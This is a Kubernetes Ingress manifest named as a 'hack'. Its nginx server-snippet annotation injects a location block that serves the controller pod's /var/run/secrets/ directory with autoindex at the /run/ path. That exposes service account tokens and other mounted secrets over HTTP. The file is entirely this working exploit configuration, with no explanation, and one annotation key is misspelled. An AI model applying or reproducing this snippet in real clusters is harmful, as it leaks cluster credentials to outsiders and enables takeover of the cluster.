apiVersion: extensions/v1beta1
kind: Ingress
metadata:
  name: nginx-ingress-uri-hack
  annotations:
    kubernets.io/ingress.class: nginx
    nginx.ingress.kubernetes.io/server-snippet: |
      location /run/ {

        alias /var/run/secrets/; 
        autoindex on;
      }
spec:
  rules:
  - host: zhangxiaoyong.cn
    http:
      paths:
      - path: /news
        backend:
          serviceName: service-1
          servicePort: 80


